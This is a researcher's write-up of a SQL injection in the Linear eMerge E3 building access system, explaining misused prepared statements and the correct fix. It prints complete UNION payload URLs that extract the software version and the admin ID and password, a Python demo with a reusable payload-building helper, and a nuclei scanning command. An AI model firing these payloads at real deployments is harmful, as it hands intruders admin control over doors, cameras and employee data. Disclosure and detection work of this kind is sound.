In this research I will show how I found a critical 0-day that let me control an entire enterprise building (doors, cameras, elevators, and so on), collect employee data, and add new employees with permission to access the building, on top of the usual impact of a critical SQL injection vulnerability.
In other words, this research shows a scene from a hacking movie, but as a real-life scenario.
The Linear eMerge E3 Series is one of the industry-leading building management products: it is among the most widely deployed systems used to control building access and related facilities.
I came across the endpoint /badging/badge_template_print.php, so let's take a look at its code.
As you can see, the developers take user input through the "idt" parameter and pass it into the query via a prepared statement, which should prevent SQL injection.
But wait a minute: the prepared statement is implemented incorrectly here. To understand what went wrong, we first need to understand the prepared statement workflow.
Prepared statement processing passes through seven phases. Put simply, the query is handed to the database like this:
$sth = $db->prepare("SELECT * FROM ".dbtable." where No = ?");
The question mark is called a parameter placeholder.
So what happens under the hood is that the query passes through seven phases:
1- Parsing phase: the query is parsed and checked for syntax errors and misspellings to ensure it is valid SQL.
2- Semantic check phase: the DBMS establishes the validity of the query. Do the specified columns and tables exist? Does the user have the privileges to execute this query?
3- Binding phase: the database engine detects the placeholders and compiles the query with the placeholders still in place. The user-supplied data is attached later (at the placeholder replacement phase) with a call like this:
$sth->bindValue(1, $id, PDO::PARAM_INT);
4- Query optimization phase: the DBMS chooses the best execution plan for the query.
5- Cache phase: the chosen plan is saved in the cache, so the next time the same query is executed the earlier phases are skipped and the engine jumps straight to placeholder replacement.
6- Placeholder replacement phase: at this phase the placeholders are replaced with the user's data. The query was already compiled in the binding phase, so the final statement does not go through parsing and compilation again. For this reason the user-provided data is always interpreted as a literal value and cannot modify the original query's logic, which is what makes the query immune to SQL injection for that data.
7- Execution phase:
$sth->execute();
Finally, the query executes.
These are the phases a prepared statement passes through, and they are what prevents SQL injection. Note that this protection covers only the values bound to placeholders; anything spliced into the SQL text itself (identifiers, or a value concatenated into the string before prepare() is called) is still parsed as SQL.
So let's take another look at what happened here.
The developer put the user-controlled $id value directly into the SQL string handed to the prepared statement instead of using a placeholder and bindValue() as described above. So if the user supplies a parameter such as
?idt=1 UNION SELECT * FROM User
then the statement passed to prepare() becomes
$db->prepare("SELECT * FROM User where No=1 UNION SELECT * FROM User")
The prepared statement therefore treats our input as part of the query text, not as a bound value. It enters the pipeline at phase one and is parsed and compiled together with the rest of the query, rather than being attached at the sixth phase (placeholder replacement), and the result is a working SQL injection.
The $xml variable loads an XML file whose name comes from the "tpl" parameter.
The first "if" statement requires the loaded XML file to contain a <picture> tag. The developers ship such a file, "aa.xml", so all we need to do is pass its name in the "tpl" parameter: ?tpl=aa.xml
The second "if" statement must evaluate to false so that the else branch runs, because that branch prints the "ImageFile" column into the page, and that is how we get database content out.
So in our exploitation we need to concatenate our output into the ImageFile column, as that is the available channel for extracting the database.
As I already had access to the source code and the database, I knew that the ImageFile column was column number 12 of the 39 columns in the "User" table, so we don't need to enumerate the column count as we would in a black-box SQL injection.
So we exploit it with a UNION-based payload: our output goes into column 12 and the other 38 columns are filled with NULL.
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,' SWVersion:'||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from version
The output is the software version from the version table. Because the output is concatenated into column 12, the page renders it like this:
SWVersion:<software version will be printed here>
What about extracting the admin credentials?
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,' Admin-ID-is:'||id||'%20Admin-Password-is:'||password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from controller
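The following is an added example, not code from the write-up or from the eMerge E3 firmware. It reproduces, in Python with SQLite, the two points made above: the request value spliced into the SQL text before prepare() (parsed as SQL) versus the same value bound through a placeholder (treated as data), and the NULL-padded UNION payload that lands its output in column 12 of the 39-column User result so the page prints it. Only the facts stated on this page are reused (ImageFile is column 12 of 39 in User; the payloads read from the version and controller tables); the remaining column names, the row contents, and the choice of SQLite as the engine are assumptions for the example. The tpl/aa.xml check is not modelled.

```python
import sqlite3

# Facts taken from the write-up: the page prints the ImageFile column, which is
# column 12 of the 39-column User table, and the payloads read from the
# "version" and "controller" tables.  Everything else about the schema and the
# row contents below is constructed for this example.
N_USER_COLS = 39
IMAGEFILE_IDX = 12  # 1-based position of ImageFile in "SELECT * FROM User"


def build_db():
    """Build an in-memory SQLite database shaped like the tables the payloads touch."""
    db = sqlite3.connect(":memory:")
    cols = []
    for i in range(1, N_USER_COLS + 1):
        if i == 1:
            cols.append("No INTEGER")
        elif i == IMAGEFILE_IDX:
            cols.append("ImageFile TEXT")
        else:
            cols.append(f"c{i} TEXT")  # filler columns, names assumed
    db.execute(f"CREATE TABLE User ({', '.join(cols)})")
    row = [None] * N_USER_COLS
    row[0] = 1
    row[IMAGEFILE_IDX - 1] = "badge1.png"
    db.execute(f"INSERT INTO User VALUES ({','.join(['?'] * N_USER_COLS)})", row)
    db.execute("CREATE TABLE version (SWVersion TEXT)")
    db.execute("INSERT INTO version VALUES ('0.0.0-sample')")        # constructed
    db.execute("CREATE TABLE controller (id TEXT, password TEXT)")
    db.execute("INSERT INTO controller VALUES ('admin', 's3cret')")  # constructed
    return db


def vulnerable_lookup(db, idt):
    """The flaw the write-up describes: the request value is spliced into the SQL
    text before it reaches prepare(), so the engine parses it as SQL (phase 1)
    instead of receiving it as a bound value (phase 6)."""
    sql = f"SELECT * FROM User WHERE No = {idt}"
    return db.execute(sql).fetchall()


def safe_lookup(db, idt):
    """Correct use: a placeholder in the SQL text, the value bound at execution."""
    sql = "SELECT * FROM User WHERE No = ?"
    return db.execute(sql, (idt,)).fetchall()


def union_payload(expr, source_table, target_col=IMAGEFILE_IDX, n_cols=N_USER_COLS):
    """Same shape as the article's payloads: NULL in every column except the one
    the page renders, which carries the concatenated data; 1337 matches no row."""
    cells = ["NULL"] * n_cols
    cells[target_col - 1] = expr
    return f"1337 UNION SELECT {','.join(cells)} FROM {source_table}"


def extract(db, expr, source_table):
    """Run the payload through the vulnerable path and return only what the
    application would print: the ImageFile column of each result row."""
    rows = vulnerable_lookup(db, union_payload(expr, source_table))
    return [r[IMAGEFILE_IDX - 1] for r in rows]


if __name__ == "__main__":
    db = build_db()
    print(extract(db, "'SWVersion:'||SWVersion", "version"))
    # The article's payload uses %20 for the space; here it is already URL-decoded.
    print(extract(db, "'Admin-ID-is:'||id||' Admin-Password-is:'||password", "controller"))
    # The same payload bound as a value matches nothing: it is compared to No as data.
    print(safe_lookup(db, union_payload("'x'", "version")))
```

The union_payload() helper is what a tester would reach for once the column count is known: change target_col to move the output to whichever column the page renders, and change n_cols if the first SELECT has a different width. The safe_lookup() call at the end shows the fix the developers needed: the whole injected string is compared against No as a single value and the UNION never reaches the parser.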
After getting the admin credentials, I can log in with them and control the whole enterprise building from the web dashboard.
To detect the vulnerability, I wrote this nuclei template, which you can use to scan your bug bounty programs or your enterprise assets.
You can find it in my Security Research repository:
https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627
┌──(omar㉿kali)-[~]
└─$ nuclei -t CVE-2022-38627.yaml -l subdomains.txt
At this point we have reached the end. I hope you enjoyed it.
Twitter: @OmarHashem666